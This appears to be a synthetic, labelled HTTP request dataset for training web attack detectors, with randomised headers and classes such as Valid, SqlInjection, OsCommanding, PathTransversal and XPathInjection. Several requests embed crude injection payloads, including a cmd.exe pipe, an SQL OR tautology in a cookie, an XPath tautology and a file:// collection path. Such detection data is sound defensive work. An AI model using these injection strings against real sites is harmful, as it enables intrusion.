If-Match: *
If-None-Match: "p2@jPP62BlQdFRMkN2"
If-Range: *
Max-Forwards: 3584
MIME-Version: 2.7
Pragma: hso='0EabWd'
Proxy-Authorization: Basic c3RvbzpFcHRvbG0=
Authorization: stt7m heees=nnhm3bi
Range: 025-,561060-
Referer: /abllnwtu/gosueao6/y7st/5hNvtj.js
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/4.4 (X11; U; Open BSD i586 8.4; ts-to; rv:8.2.2) Gecko/36490915
UA-CPU: 68000
UA-Disp: 106,481,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 552x8251
Via: Mdbet/5.1 www.etmu0215.shtml, ntqa/8.9 www.nfhbmaL.png, 7.3 www.anty.css
Transfer-Encoding: identity
Upgrade: HaT6gy/0.1
Warning: 782 www.e5rte.tiff:876 "07ituthT2yrwlHit1ah" "Sat, 29 Jul 06 07:27:58 CET"
X-Forwarded-For: 246.239.174.69
X-Serial-Number: 68319129
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43369
Start - Id: 44874
class: PathTransversal
GET /viidIgkmtr/s9eE38_qadviuQ/0dfEJOaodB/4snedd1ao/GLAj/nd3rIu_LhsmnP@Y/IjscC3Y3GyMCI/m5Z8/iPJa@Oeki/ooRaoeEe2tf4eL/yelarebhaseyF4i/4aNe1kKwp-tmpg2bnv.jpeg?Nj=kx8ez&sCKS0xVn=937094&uperhif=collection%28+++++file%3A%2F%2F%2Fc%3A%2Fete27%2Fzerb.xml%29&WuwpEZ=zn&miSM9iTnwVDE=7877109&net6Abtiinc0=execevu%5CtraA&ct=aeam&KkEsgR=Yoni%3D&obmceab=07163 HTTP/1.0
Host: www.timh.uk:80
Connection: rpatrDmm
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: *
Accept-Language: re-ea;q=0.1, d5tiE0i-kx;q=0.7
Cache-Control: max-age=2663
Client-ip: 32.25.74.7
Cookie: 55ctskeyg=djgn
Cookie2: $Version="6"
Date: Fri, 15 Sep 06 15:15:47 CET
ETag: W/"H7HzLJtM8gxyDdg"
Expect: ritRee
From: crrs@n6en.net
If-Modified-Since: Fri, 15 Jan 10 15:58:51 GMT
If-Unmodified-Since: Mon, 10 Sep 07 07:07:19 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2139
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM bmhJZUFldG5uY2FVdGVFdXNlU1Zpb1llcUZ0bWRkQ0F0YWVlZml5Z2Vv
Authorization: NTLM eW9lYXR0VjRpbTNpazJ1MHN0d2VpaHV5NXR3dWVkYmFjdXB0Z3NiZGdIZ20=
Range: -41,56231-,-8575
Referer: /ycsin.mpeg
TE: gzip,trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/1.3 (X11; U; Open BSD i586 2.8; ca-cp; rv:2.0.9) Gecko/35800961
UA-CPU: 68000
UA-Disp: 229,303,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 458x842
Via: 5.8 www.raoYe.jpeg, HTTP/5.7 74.144.123.44, 3.0 www.dItnuqws.png
Transfer-Encoding: mhSsr1
Upgrade: taswen/8.6, 6o7td/4.7, soc/6.3
Warning: 919 218.70.108.162 "ndpaastlweaihe5" "Thu, 07 Apr 05 15:20:50 UTC"
X-Forwarded-For: 74.214.158.51
X-Serial-Number: 279429
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44874
Start - Id: 7792
class: Valid
PUT /hAlYdoUm-Bls7GaF/QxvI46AF.html? HTTP/1.1
Content-Length: 106
Content-Language: slegt,qdnlx
Content-Encoding: gzip
Content-Location: /ttdehoas/jwlehy3.php3
Content-MD5: RVd0dG9oSTVwY2UyZWhpYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 15 Oct 06 10:34:12 GMT
Last-Modified: Sat, 14 Oct 06 21:16:30 GMT
Host: 221.193.224.249
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.3
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 189.127.229.94
Cookie: .9CdropjFzhp=3za;oytsp9o=0909;w7lI1Z=poilyc;z5=system?td6No4;Zun=8228147524
Cookie2: $Version="432"
Date: Sun, 19 Sep 04 18:46:26 UTC
ETag: "Why3H83yM7wv-4u"
Expect: 100-continue
From: eulan@anegdeSbMI.uk
If-Modified-Since: Sun, 14 Feb 10 24:45:38 CET
If-Unmodified-Since: Sat, 16 May 09 23:20:50 CET
If-Match: "Y.xBGr2WHWgOXNta"
If-None-Match: "b5eGwm2uMSm5EoVX"
If-Range: Sun, 13 Dec 09 16:50:55 GMT
Max-Forwards: 19
MIME-Version: 6.3
Pragma: at8mmbf='ayh'
Proxy-Authorization: NTLM aXF6Z3NCeWUzYXNtQ09NdW05YXRpcnNzYm8zdFRuYUFlYWpmb2VlbmU=
Authorization: NTLM Z2FhZTlyaU5lNWdhb2VldGh3MGR0ZW13aGRkcml1c3g0aXRvc05vbDB0bG5pNGVy
Range: -7629
Referer: http://8iaai.biz/jqErieev/tzsqxT/rdene.msf
TE: trailers
Trailer: Trailer
User-Agent: Mozilla/2.2 (Machintosh; U; Mac OS X 9.1; 1e-io; rv:1.8.4) Gecko/28937909
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 669x1617
Via: FTP/8.1 www.eoMO.gif
Transfer-Encoding: gzip
Upgrade: it6t3/5.6, Tslram/3.5, wli/0.1
Warning: 310 www.tuatshe.jpg:92418 "aTmit2nDei" "Sun, 14 Mar 10 19:02:00 UTC"
X-Forwarded-For: 202.225.233.245
X-Serial-Number: 27066605
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

itiound0ts5ht=neieao7s84hmRm&Cii=Cn1nlfrtpicnp4ee&_WxLglikeo=feeo&asmsuyges=6B)L&naietlozEj=dsro eTEZdoe

End - Id: 7792
Start - Id: 7686
class: Valid
POST /z0lIt8N@oryNRps/t1rc/tYO2z8IN8_XeCvJ6l/uD/toSekuraeN4her/eotpclcjcnnven/dL8Pr.U8EvK/3316N7d62bFid9hYN/ssrcmhae.jpeg? HTTP/1.1
Content-Length: 273
Content-Language: wzris,e
Content-Encoding: compress
Content-Location: /tt8t/oeN1/cu7h1dsr.tar
Content-MD5: QWlzbHR1c2VlbGRvd3drYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 09 Aug 08 06:01:10 CET
Last-Modified: Tue, 13 Mar 07 04:51:00 UTC
Host: 118.57.232.215
Connection: wb7xieoh
Accept: image/*, video/quicktime, audio/basic
Accept-Charset: *
Accept-Encoding: *;q=0.5
Accept-Language: rj48ba-weA;q=0.6, tk-lgUos;q=0.3, ht-ooben
Cache-Control: min-fresh=58
Client-ip: 41.206.202.253
Cookie: ohht5oiuri=taeIaaDoat
Cookie2: $Version="33"
Date: Thu, 06 Sep 07 05:39:25 GMT
ETag: "Yyea6Aa1SS6qTQSBPHH4"
Expect: 100-continue
From: iein@nruizurNh.it
If-Modified-Since: Sun, 03 Oct 04 11:46:48 GMT
If-Unmodified-Since: Fri, 27 Jan 06 18:25:16 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Jun 07 18:02:00 GMT
Max-Forwards: 0106
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic cGllYWc6eHBvbmw=
Authorization: wtfep oeett2e=oxgbe
Range: -5
Referer: /nr7irrti/rshnd/sh8d/eiNhzza/fobo.aspx
TE: deflate;q=0.6
Trailer: Pragma
User-Agent: rV.KVSKXW http://www.neeae6.be
UA-CPU: Sparc
UA-Disp: 1023,063,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 592x583
Via: HTTP/4.8 www.sQseuhoa.png, 1.5 90.251.151.126
Transfer-Encoding: deflate
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 49.121.77.5
X-Serial-Number: 207817974117
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~

tfte1=wZ7cez8rW-&zeaerbuBe=916009&WQzkTR3kzuXj=6Olikel&A3tosbn=tneriocmargb&sq=6&rnbsIaisvoL=rlog34Xdeso&2htetrite=pMlipV6HYgT&aaqlnlteam5n=e3au+&1yG7NX8Z8YRH=waeoa9j&UcH8HK=iV5K&I7enUid1h=enr%u&enlspnAieyrupi0=uostseueehiateea&nch0bLOtrsttE=aDg.sWA6J&hatcsowatOAohd=Su

End - Id: 7686
Start - Id: 42885
class: OsCommanding
GET /aehses2i17dgHEeaN1e/tvXO29X.fBPm/9nQglfDoz.tu8/l5br1yeWeg/dnloEdn1r4kp.htm?ritjl3vnrr=127979521&ces=e4w%2Fg&iwiii4otgl=wais5efwEseR&ar=eIwRO&etfossgdowIa=pnwvEbi4htoxtEidti&ud9rms=141&orUDSqg.k=22.157.20.163++++%7C++cmd.exe+%2Fs&execrmsock_streamM=Ntmlnr&amrrmNwn=84940467&O_CExp_a0V=ta%3Cie25a&aWOsb5wo4aie=e%24hmeta%2Ften%7Ccats%3Flyi&l6=hmPdfell&xhddo5ioa=jin HTTP/1.1
Host: www.ndue.cz
Connection: noeth3f
Accept: application/zip, video/mpeg;q=0.6, text/plain;q=0.3
Accept-Charset: *;q=0.1
Accept-Encoding: gzip, gzip;q=0.7, compress;q=0.4, deflate;q=0.4
Accept-Language: e8eiYdeo-naed;q=0.7, o-da3erkl;q=0.1, wsslwd-eaahma;q=0.2, gewsee-f;q=0.2
Cache-Control: max-stale=9
Client-ip: 96.55.27.134
Cookie: dFbUmocha=379;eor6edU04ahimtf=raef;cioToot=59730645
Cookie2: $Version="1"
Date: Sun, 05 Sep 04 04:55:55 UTC
ETag: "Wp7NOJ9WHkU4s9jlY"
Expect: 100-continue
From: n2zse0bo@tibsA.uk
If-Modified-Since: Sat, 13 Jun 09 14:38:46 CET
If-Unmodified-Since: Wed, 23 Jan 08 13:08:06 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 22 Apr 10 20:29:19 CET
Max-Forwards: 54
MIME-Version: 9.3
Pragma: unf=lUwhyeeg
Proxy-Authorization: NTLM aWRkcWhsaTFkaDVIc2pvZXNoc3J0cmVzeHlldWVCeWVzbg==
Authorization: dyuae ideolaua=dtuainn
Range: 34480-7538,5879-,186-597
Referer: http://www.ogmb.org/7ne6dfaa/rteolDe/l3hri/EYCimer/iF7vfrTi.txt
TE: trailers,trailers,trailers
Trailer: Upgrade
User-Agent: oCFi0.N http://www.eifeom.it
UA-OS: Win98
UA-Pixels: 4835x5695
Via: 4.2 104.99.53.44, HTTP/1.9 www.sd1tt.html
Transfer-Encoding: deflate
Upgrade: dal3ei/8.1, medohh/7.9, vcief/8.1, tln78a/9.5, fsssme/7.1
Warning: 973 www.a2Mltbl.jpeg "ycengdeih" "Sun, 20 Nov 05 15:07:42 CET"
X-Serial-Number: 7523333494346880207
----: -----------------------------------------------

null

End - Id: 42885
Start - Id: 28524
class: Valid
GET /o-@rms.H.png?4shm9Lootihts=evj HTTP/1.1
Host: 235.121.64.72:9393
Connection: close
Accept: */*;q=0.1
Accept-Charset: x-mac-greek;q=0.1, windows-1250;q=0.1
Accept-Encoding: gzip;q=0.0, identity, compress;q=0.4, gzip;q=0.8, identity
Accept-Language: *
Cache-Control: yraeen='ufa'
Client-ip: 86.240.167.85
Cookie: iUraen=70052828;csgitigizh=sdttae;et3sggcb6Un=rmlike 
Cookie2: $Version="88"
Date: Mon, 12 Apr 04 20:08:34 CET
ETag: W/"jk3QcDDG_iuMN0Cb1iO"
Expect: ehGe=nuzcoon
From: oSchO@nretCorwsa.st
If-Modified-Since: Sun, 08 Feb 04 08:04:49 CET
If-Unmodified-Since: Sun, 03 Jun 07 02:21:58 CET
If-Match: "mGZu@dswMCodRSPWdW1"
If-None-Match: "l6BUHLILyDVxDpeQ"
If-Range: Fri, 17 Mar 06 24:24:31 UTC
Max-Forwards: 8
MIME-Version: 6.5
Pragma: arlocE='v9teef'
Proxy-Authorization: rfNki eds412id=t8vE
Authorization: grai4e h9zfi=cac8dncs
Range: 7-93,534-66746
Referer: /stvh/geonuo6l/hrp0mamn.pdf
TE: trailers
Trailer: Cache-Control
User-Agent: 7e7weinme (eneYTPD; tkIART; l.moF5PGBZ)
UA-CPU: PowerPC
UA-Disp: 3600,6698,8
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 116x668
Via: 3.8 www.J1m8.tiff
Transfer-Encoding: i8kni8
Upgrade: ssc6/7.2
Warning: 648 www.ttih.html "ord3rsoanoeqih" "Mon, 01 Jan 07 08:14:14 UTC"
X-Forwarded-For: 32.243.80.201
X-Serial-Number: 672108482852
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28524
Start - Id: 21273
class: Valid
GET /oJWiH.js?xeshgthI1evdei=r%28a%3Ffnform9nf&fnoepoeiC0IeT=3nrnoeb0nejltehgA&JCWnn=holde&pIdivnsZ=6O+6dnaeyshnp&nepatwmmlInT=h6moQG&nvegoOol4l5=77 HTTP/1.0
Host: www.HeaT.biz:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: gzip, compress, gzip;q=0.9
Accept-Language: *
Cache-Control: uEoIpAzg=r
Client-ip: 83.86.54.168
Cookie: ACFBRv=6632550;0tgaiz7aAn5=i]hna;cH2U4-l_jTa=218387
Cookie2: $Version="42"
Date: Sun, 07 Mar 10 22:24:16 GMT
ETag: "HPxL4jZpZyyUG8R9TSXv"
Expect: hOsusai=daoao;7tesylm=de1l
From: rodie@O0kE.st
If-Modified-Since: Wed, 26 Jan 05 06:33:14 CET
If-Unmodified-Since: Fri, 28 May 04 04:31:19 CET
If-Match: *
If-None-Match: "DUPnLazGC-NxEGv.m"
If-Range: Fri, 27 Aug 04 23:15:47 UTC
Max-Forwards: 121
MIME-Version: 6.6
Pragma: bieronhC='e'
Proxy-Authorization: rfoaR s8Soey=iediu
Authorization: NTLM dHB0dHVib21kZGc2dHJldGVoYmhpdXNtaTBlZVRoaW90bWF6YWljbg==
Range: 793-,8602-038713,9-
Referer: http://www.exaG.com/ut9d/HtN1e/3wEae7t7/uyh9rjws.zip
TE: trailers
Trailer: TE
User-Agent: Mozilla/6.0 (X11; U; Linux i386 3.8; ae-so; rv:3.2.1) Gecko/16290767
UA-CPU: PowerPC
UA-Disp: 552,365,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 714x7693
Via: 1.1 www.natcv.shtml:316, 8.7 www.ahsuptsc.gif:7855, lh0ons/6.6 www.aateatt.png
Transfer-Encoding: gzip
Upgrade: aiaUud/7.9
Warning: 031 41.122.125.127:7076 "Eiaoenuons" 
X-Forwarded-For: 172.206.4.103
X-Serial-Number: 900444
----: ---------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 21273
Start - Id: 255
class: Valid
GET /ekoh1qtRbkoSis/2dssusvali/hdeoetirte/eNODjNuNO-5LoNaD/ae/aE/owepstmmbsmo/BPmM7/rEiAe98VJzUNA/a-KNAQKlWGz@HK5n-b/y1rOJ_Q1Vg77/gktGeU2eR1.htm?ii=00729910&ta=sTilmaRarqw4hiae&EpUm%u_jeHeaccess_log=2747939&z8oHam1f1ipcbs=40834&s6n6aedaHjghioy=ihtaccesJEi%5Cqe&emnceOvtsu=tmH5mJ32u&e6FPAy9Ec=iU&er7srneiema=dopE&6QFnexecUb=73439021&oODHqOlinkQXV=16&tsOnimajfme=2etidzEnie&lU-2oKe=note&howtme81nshfeb=oeboay&iatni1lHnkt=deletepl HTTP/1.0
Host: www.Xtgryjcess.de:3463
Connection: close
Accept: */*;q=0.2
Accept-Charset: x-mac-arabic;q=0.4, x-mac-greek;q=0.1, windows-1250;q=0.4, x-mac-arabic, windows-1257
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 124.33.47.215
Cookie: sokhnoll3i=imevn
Cookie2: $Version="731"
Date: Wed, 26 Sep 07 13:25:03 CET
ETag: W/"8ngAg-0J-BQAxHJ"
Expect: tpitsuee=kaEHtmts
From: yeXhbouc@7trpphie.it
If-Modified-Since: Mon, 27 Oct 08 22:35:58 UTC
If-Unmodified-Since: Tue, 22 Dec 09 15:12:03 GMT
If-Match: "DUkzgtk@BmVorXMWiWK"
If-None-Match: *
If-Range: Sun, 21 Jun 09 14:46:29 UTC
Max-Forwards: 9
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: nnedm sagh=xef1hdc
Authorization: sdse eO3ut1=Wkg3l
Range: -735916,3400-462,6-4322
Referer: http://www.slarld.com/gewImm23/tstm8/mjOaghee/texdbn.cgi
TE: gzip;q=0.5,trailers
Trailer: Date
User-Agent: gneo4rntcr7ke8lt5e
UA-CPU: Sparc
UA-Disp: 7657,8182,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4622x2387
Via: 2.4 www.shaer9.jpeg, HTTP/4.3 www.echtsnes.css
Transfer-Encoding: compress
Upgrade: s0xkh/1.0, aoohr/0.2, neh/8.7, kmSce/3.3
Warning: 778 228.207.156.98 "emdbsg0nhaeda1q" "Thu, 02 Sep 04 15:14:39 UTC"
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 388092866322
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 255
Start - Id: 41335
class: SqlInjection
GET /zh53/heOiails6/stiSto/1t5VnAhI4fXkeRk/linkZxtermY9K/egUooG_WLgew8Ku35d/e8Q6myB0e/mm5tu8Y4./za4hesxulfsutrsgdctE/y2I7rs3BaJp5bvhoOaAn/esrrcti4yebgsilydre.bin?75p=soapeaie+e5hnn&dndti3ezx=dlzMl+deletee&grnIytqm=6V%40B-FIonLn&egnyo=eL0IwUMx0w HTTP/1.1
Host: www.0ehgio.be:80
Connection: eEtbaipu
Accept: application/zip
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.8
Cache-Control: no-store
Client-ip: 87.232.160.255
Cookie: KRko6Zf=OR     '6etnthssTs'    =    '    '
Cookie2: $Version="8"
Date: Sat, 23 Jun 07 03:35:26 GMT
ETag: W/"cKDNr8CH.0z91yq@kFD"
Expect: 100-continue
If-Modified-Since: Tue, 23 Aug 05 21:16:02 UTC
If-Unmodified-Since: Mon, 10 Sep 07 10:07:20 UTC
If-Match: "mRXWxRNuSpDXscj"
If-None-Match: "BAhw7m.T1rD981SwL"
If-Range: Sat, 21 Aug 04 11:01:08 CET
Max-Forwards: 0
Pragma: no-cache
Authorization: t7ai Stotedm=dMnQ7iEg
Range: 481797-7272,-0
Referer: http://5oacEo.ch/Unnar/rjid/i7eknif0.sh
TE: chunked
User-Agent: Mozilla/9.5 (X11; U; SunOS sun4u 6.4; in-ni; rv:9.2.2) Gecko/10232958
Transfer-Encoding: deflate
Upgrade: lrh3x/8.6
Warning: 221 www.ieHmnseN.shtml "tc0exeLby" "Thu, 15 Apr 10 21:19:31 UTC"
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 41335
Start - Id: 19996
class: Valid
GET /MyieEfRU/xbody44vx0aormWx/2BlG0lRxE@L3/qO1QC/cjDa/rLaGpTPPJn2VyDz5/EBzD2aAwrcpupdateBFEU.swf?cutn1=6&adH=6hhniN1h70rzt&aariiCu=r&4etnet=%25uyhsdhttpah%2B0r%25d%2Fi%3Ej&Kamnatctfl6H=riisi&uFo=742901&acp3dEsqkYm=xlt&9asaCaoFdsTavoe=67953&Da3unionhQYG1NJ=42903642&airy1hyLetm=551724&diNu=abKvj&vnqermie5mhbE9N=EaeEjmo3rj&n77ijachuhctbl=ps%5D+z&Y3Ro1ua2yanoun=%3Bb+c&jV-uPFnhE__a=b%3Aue HTTP/1.1
Host: www.Ei2iaUx.uk
Connection: iacJine1
Accept: image/*;q=0.3, image/*;q=0.7
Accept-Charset: ks_c_5601-1987;q=0.8, gb2312, cp-950;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale
Client-ip: 64.117.51.13
Cookie: elnadeaiwap=b4]4;Fgo=open;nyweieej=3277;dttawwR8yefzsn=9
Cookie2: $Version="89"
Date: Sat, 03 Dec 05 08:22:50 CET
ETag: "kH.q4gSijpl6-pcC4"
Expect: snesin
From: 8oou@eyrfw.gov
If-Modified-Since: Mon, 14 Jul 08 13:12:25 UTC
If-Unmodified-Since: Wed, 26 Nov 08 07:50:35 UTC
If-Match: "kJ7Mi8Acd1WdrLjYWA"
If-None-Match: *
If-Range: Mon, 05 Dec 05 15:25:27 UTC
Max-Forwards: 425
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: dnaoe2 udeho=Assa
Authorization: fVtifb z6sasiD=Nrae
Range: 2515-,-14,1-75
Referer: http://www.qttoa.be/jMnfhlen/tehu6tR5/slita/bhOcevt.jsp
TE: chunked;q=0.6,trailers
Trailer: Range
User-Agent: 9sanxrAqo/5.9
UA-CPU: MIPS
UA-Disp: 162,7111,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 1394x7760
Via: 2.9 54.135.117.55:13, 6.6 174.129.41.14, ut1f/3.7 www.5rseco.css
Transfer-Encoding: ecwe; atxbp4=lhllgr
Upgrade: fuse/0.1, nec/0.2, daue/4.4
Warning: 177 www.at8ajuht.css "brespotrx" "Sun, 04 Jan 09 15:35:14 GMT"
X-Forwarded-For: 39.120.128.67
X-Serial-Number: 81008512960196254
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19996
Start - Id: 4485
class: Valid
PUT /caoetsseultmNlkesi/aXYvKTpvlr3pQ/dJYocZ24udMn/mrc4yeon2lmhw0encEsc/h1dOYHHlufwbxMjvbqv5.js? HTTP/1.1
Content-Length: 127
Content-Language: m1iamk,a5rw,8
Content-Encoding: compress
Content-Location: /a47pw4f/qnnf/e7oi/onluA.js
Content-MD5: bHRyMXNiYWRlYWFUYW9nUg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Jul 06 05:26:52 GMT
Last-Modified: Mon, 05 Jan 09 17:27:56 CET
Host: 112.128.89.55:80
Connection: c77l
Accept: text/*;q=0.3
Accept-Charset: euc-jp, windows-874, iso-8859-8-i, iso-8859-1;q=0.6, x-mac-icelandic
Accept-Encoding: *;q=0.8
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 91.104.180.44
Cookie: zsTcu3=mgml5;nAlelTivnzow=hoEgr;tsesbi7jont=]eta;AhiotnNts=428986;liframenadminTHK367U5=lesntfenrl;hKf_43Z=150676
Cookie2: $Version="8"
Date: Mon, 22 Aug 05 15:50:33 UTC
ETag: "wXHuvsEH5vy0Rwmi"
Expect: svel1e=etsIyet;tTqe
From: bf9teahb@eaaAl.be
If-Modified-Since: Thu, 01 Nov 07 04:25:19 UTC
If-Unmodified-Since: Sat, 04 Apr 09 16:53:20 GMT
If-Match: *
If-None-Match: "plATrM-f8f4m9Gz"
If-Range: Sat, 06 Nov 04 01:27:21 GMT
Max-Forwards: 3633
MIME-Version: 8.8
Pragma: t=sWscef6n
Proxy-Authorization: Digest username="dorrt"
Authorization: tlThn ksird=yOcot
Range: 58-081,-238
Referer: /soiee/AiisoeN/ce26a1S.txt
TE: trailers,gzip;q=0.3
Trailer: Accept
User-Agent: Mozilla/2.3 (X11; U; SunOS sun4u 3.6; yh-tC; rv:6.1.4) Gecko/91151199
UA-CPU: MIPS
UA-Disp: 9080,142,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 421x3151
Via: efae/8.0 www.aE2fqhtl.html:736
Transfer-Encoding: awan1
Upgrade: Nh5/1.2, 4illg/1.5, plnv0/0.1, dsEn4/3.7
Warning: 842 189.66.165.24 "ccUelchs9dtqh" 
X-Forwarded-For: 108.74.212.152
X-Serial-Number: 944553276
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

yoeeoRyanTdoees=9r&treyUnn4=axhnt&jiOmocioSioynhm=t&RlHbGuOe=uPIzs&phpObekP=599623&etYial7eato=K|e~565u&etoindxs=4676605542

End - Id: 4485
Start - Id: 49103
class: XPathInjection
GET /fset8t/iUSFT2j.html?waim09tehst=po%27+++or++kNe%2Fe%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D367%5D++++or++%27es60%27+%3D+++%27&2araj=312366214&Foizj=Cgahcs7efiT75Noep HTTP/1.1
Host: www.cias4ln.com:80
Connection: close
Accept: image/*, audio/x-wav;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: ur92whor-RuziPdl, hr23p8nb-yn6t, ehice-wi;q=0.0, darn-Ak;q=0.8, tmsr-dAotik8n;q=0.1
Cache-Control: ephrtr='dott'
Client-ip: 139.222.82.202
Cookie: kdhWtUZ=gengcnnkiht;sd=537461666;tbwesdanaduviN=0368;ytaoe9=5;0C2t_7id=2u1B;o2ncNwindow.openE=422
Cookie2: $Version="48"
Date: Fri, 27 Feb 09 19:30:54 CET
ETag: "i9p280DZTSCOq9@T"
Expect: 100-continue
From: o1Nf5@ocset.it
If-Modified-Since: Mon, 14 Feb 05 08:13:39 GMT
If-Unmodified-Since: Sun, 05 Jun 05 14:00:58 UTC
If-Match: "xOdDzZBstjtmPsNj"
If-None-Match: *
If-Range: Mon, 30 Aug 04 16:11:58 UTC
Max-Forwards: 766
MIME-Version: 4.7
Pragma: no-cache
Proxy-Authorization: Basic ZmhkZTp0dWV1dA==
Authorization: et64ot flE5y=1aat
Range: 80-
Referer: /Ee5mnle.mpg
TE: trailers
Trailer: Referer
User-Agent: Mozilla/6.2 (Machintosh; U; PPC 3.3; io-je; rv:8.7.7) Gecko/70450519
UA-CPU: StrongARM
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 7313x7197
Via: 8.6 151.112.194.68
Transfer-Encoding: deflate
Upgrade: ftis/8.4, aiar9w/5.5, wticg/0.0
Warning: 839 245.108.185.165 "nonbs" 
X-Forwarded-For: 46.39.13.172
X-Serial-Number: 7433292
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49103
Start - Id: 8001
class: Valid
POST /oeA/eIeo/aFcQU-SuVwJfl.jt/a8fiuvCH5cnODSNUM/Gdleaedmoa6tl3/eNk8A/inuhm.shtml? HTTP/1.1
Content-Length: 79
Content-Language: t5Hh,t0u
Content-Encoding: identity
Content-Location: http://www.1esh.biz/essmdna/5ramwrk/7tjz/eeeuen/mjihi2s.dll
Content-MD5: ZGdtcmRuYW1jMnRSc2RzRQ==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 21 Dec 06 10:29:56 UTC
Last-Modified: Sun, 05 Oct 08 20:10:10 CET
Host: www.atdn.gov:80
Connection: mttm
Accept: application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: N8x-wtaavc, tttwt8-hh6l, cqisxes-e, nlaAty-aehmzw;q=0.4
Cache-Control: no-store
Client-ip: 65.187.17.2
Cookie: iuSnSsHmu=7926;hjNspe4hte=4SS
Cookie2: $Version="6"
Date: Fri, 07 Sep 07 11:56:34 GMT
ETag: "Uor8lt.MJfvmU1Tkr"
Expect: 100-continue
From: Scez@aoailhel.gov
If-Modified-Since: Sat, 28 Feb 04 04:36:06 UTC
If-Unmodified-Since: Sun, 20 Nov 05 21:16:28 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 24 Jan 07 07:26:59 UTC
Max-Forwards: 0
Pragma: no-cache
Proxy-Authorization: Fs9vs 82ivtD=qasoo
Authorization: NTLM cnN1cmNyc3dzaG1hdGlsaFUyeHNlT0VuZW5ldGVhWXdPZWh0aTBvVndmNTJvYQ==
Range: 439-82,94-,67-
Referer: http://rhoowgo.com/tOpa.cgi
TE: gzip;q=0.8,deflate;q=0.7,gzip
Trailer: Upgrade
User-Agent: pIAFbCUepR http://www.2Se8De.biz
UA-CPU: PowerPC
UA-Disp: 6556,373,32
UA-OS: Linux
UA-Color: color16
Via: 4.8 www.e0aaa.jpeg, 9.2 63.150.239.105
Transfer-Encoding: gzip
Upgrade: htayae/6.0, UnlPs4/9.9, Xiii/1.1, rali/4.0, keeywl/8.8
Warning: 335 140.161.205.35 "oreHylenmuo4vest" 
X-Serial-Number: 6980972846
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

g6RgA_ppeF=i7I&5Eo0a-KEPn=ohtel a e(ee&JkmetaKJIHNnE=h(inputlikeoTbUi8cknfe

End - Id: 8001
Start - Id: 784
class: Valid
GET /fSVV3OEZqa_Qg72/te/desrw.css? HTTP/1.0
Host: www.to4p07mso.ch
Connection: close
Accept: */*;q=0.4
Accept-Charset: cp-950;q=0.2, x-mac-icelandic;q=0.4, big5;q=0.6, windows-1252;q=0.9, x-mac-icelandic
Accept-Encoding: 
Accept-Language: Oo4tDiho-e
Cache-Control: max-stale=1
Client-ip: 255.154.164.96
Cookie: madartcdrCRc=dP@.7nQUg@Rf;I32xrmfC=2454;eiaC=45041470;r9oz=euuhbankrsighPiil;teydW=orEQso0reT
Cookie2: $Version="334"
Date: Tue, 24 Jul 07 13:56:29 GMT
ETag: "7_6P9KmfYe1-NL0"
Expect: shzzroI3
From: oxndn@a7opriy.uk
If-Modified-Since: Mon, 21 Jun 04 02:17:16 UTC
If-Unmodified-Since: Tue, 17 Apr 07 02:18:47 UTC
If-Match: "fXBFb-F-i7sV5w0wft"
